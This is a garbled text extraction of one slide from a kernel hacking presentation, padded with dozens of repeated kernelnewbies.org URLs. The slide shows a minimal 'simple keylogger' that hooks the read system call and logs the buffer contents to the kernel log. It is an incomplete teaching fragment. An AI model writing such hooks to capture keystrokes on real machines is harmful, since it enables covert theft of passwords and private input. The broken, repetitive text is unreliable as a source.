http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking -
8/2/2019 2011 01 19 Kernel Hacking
28/28
A simple Keylogger
Hook the read system call Call the original read
Log the value to the system log file
1 h o o k_ r ea d ( int fd , char * b u f , long c o u n t )2 {
3 long c = o ri gi na l_ re ad ( fd , buf , c ou nt ) ;
4
5 pr in tk ( " % s \ n " , buf ) ;
6
7 return c ;8 }
http://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHackinghttp://kernelnewbies.org/KernelHacking